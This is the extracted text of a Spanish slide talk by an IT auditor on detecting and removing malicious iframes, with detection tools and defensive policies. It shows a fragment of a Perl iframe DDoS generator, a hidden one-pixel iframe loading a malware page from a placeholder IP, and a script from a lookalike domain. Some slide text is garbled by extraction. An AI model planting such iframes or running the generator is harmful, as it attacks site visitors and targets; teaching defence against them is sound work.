DETECTANDO IFRAMES

MALICIOSOS

Formas de Intrusión

Mecanismos de Defensa

José A. García

Auditor Informático

ÍNDICE

• Conceptos Generales sobre iFrames• Funcionamiento de una iFrame• iFrames Maliciosas• Formas de Intrusión• Herramientas de Detección• Eliminación• Políticas de Control • Demostración• Tiempo de Preguntas

• Qué es una iFrame• Atributos de una iFrame

CONCEPTOS GENERALES SOBRE IFRAMES

Qué es una iFrame

<html> <head><title>IFrames</title>

</head><body>

<iframe src="http://www.unejemplo.com/" name="SubHtml"width="400" height="500" scrolling="auto" frameborder="1"><p>Texto alternativo para navegadores que no aceptan iframes.</p>

</iframe></body>

</html>

Atributos de una iFrame

id (name)class (cdata)style (style)title (text)src (uri)longdesc (uri)scrollingframebordermarginwidth (pixels)marginheight (pixels)width (length)height (length)name (cdata)Align (En desuso)

FUNCIONAMIENTO DE UNA IFRAME

Funcionamiento de una iFrame

<div class="figure" id="figure_11_3"><img src="/img/xhtml/f1103.gif" alt="Acceso a Google Analytics">

</div>

<script async="" src="//p.goodle.com/pg/js/google.js"></script>

• Una llamada a una iFrame suele ir acompañada de código. • La iFrame es sólo Una función que llama a otra

página web independiente, anidada en la primera

IFRAMES MALICIOSAS

No sólo se ejecutan en HTML#!usr/bin/perl#Iframe DDos Attack Tool

use Cwd;installer();

sub sintax {print "\n[+] sintax : $0 <target> <count file> <count iframe>\n"; }

sub start {my ($target,$files,$iframe) = @_;print "\n[+] Starting the party\n\n";print "[+] Generating files and iframes\n";for my $tx(1..$iframe) {print POC '<iframe src="'.$target.'" width="3" height="3"></iframe><br>';}………………………….

Formas de IntrusiónAtaques a Servidores FTP

Formas de Intrusión

Vulnerabilidades en páginas Web

<iframe src="http://xxx.xxx.xxx.xxx/badcode/malware.php?js" name="BadCode" width="1" height="1" style="visibility:hidden"></iframe>

Entornos Preferidos por los Hackers

CMS (Content Management System)

JoomlaWordPressDrupal…

LMS (Learning Management System)

MoodleIliasClaroLine

HERRAMIENTAS DE DETECCIÓN• Visual• Google

• WebMaster Tools• Google SafeBrowsing• Foro para Webmasters• Blog Central para Webmasters• Blog de Seguridad Online

• Otros• StopBadware• SiteCheck.sucuri.net• Unmaskparasites• Strictly-Software• Detox

Detección Visual

Google WebMaster Tools

https://www.google.com/webmasters/

Google SafeBrowsing

http://www.google.com/safebrowsing/diagnostic?site=www.nuestraweb.com

StopBadware

https://www.stopbadware.org/clearinghouse/search

SiteCheck.Sucuri.Net

http://sitecheck.sucuri.net

UnmaskParasiteshttp://www.unmaskparasites.com

Strictly-Softwarehttp://www.strictly-software.com/unpack-javascript.aspx

Detoxhttp://www.linkdetox.com

ELIMINACIÓN• Uso de Comandos de Sistema Operativo• Restauración de datos desde una Copia de Seguridad fiable• Informar a los responsables del WebSite• Uso de Scripts de Limpieza

POLÍTICAS DE CONTROL• Actualizar Directivas de Seguridad de Sistemas Operativos• Actualizar Navegadores de Internet• Actualizar sistemas de Protección

• Antivirus• Cortafuegos• Protección de Red

• Actualizar Versiones y Plugins de los CMS y LMS• Actualizar aplicaciones de terceros

• Java• Adobe

• To ar Precaucio es co el “oftware Pirata y sus parches• Antivirus – Cortafuegos – Control de Redes• Buena Política de Contraseñas• Hacer Copias de Seguridad Periódicas• Revisar Permisos de Archivos y Directorios

DEMOSTRACIÓN

TIEMPO DEPREGUNTAS

GRACIAS!!